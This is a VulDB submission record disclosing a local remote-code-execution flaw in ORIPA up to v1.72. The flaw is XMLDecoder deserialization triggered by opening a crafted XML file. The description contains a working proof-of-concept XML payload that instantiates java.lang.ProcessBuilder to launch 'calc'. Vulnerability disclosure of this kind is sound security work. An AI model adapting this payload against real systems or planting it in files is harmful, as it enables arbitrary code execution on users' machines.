| Title | oripa <=ORIPA v1.72_release XMLDecoder reflection local rce |
|---|
| Description | use XMLDecoder to read files directly
open the software, select the open option of FiLE, select the malicious xml to trigger
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="1" >
<void index="0">
<string>calc</string>
</void>
</array>
<void method="start"/>
</object>
</java> |
|---|
| Source | ⚠️ https://github.com/oripa/oripa/issues/355 |
|---|
| User | aftersnow (UID 71336) |
|---|
| Submission | 07/02/2024 04:57 (2 years ago) |
|---|
| Moderation | 07/02/2024 07:14 (2 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 270169 [ORIPA up to 1.72 LoaderXML.java deserialization] |
|---|
| Points | 20 |
|---|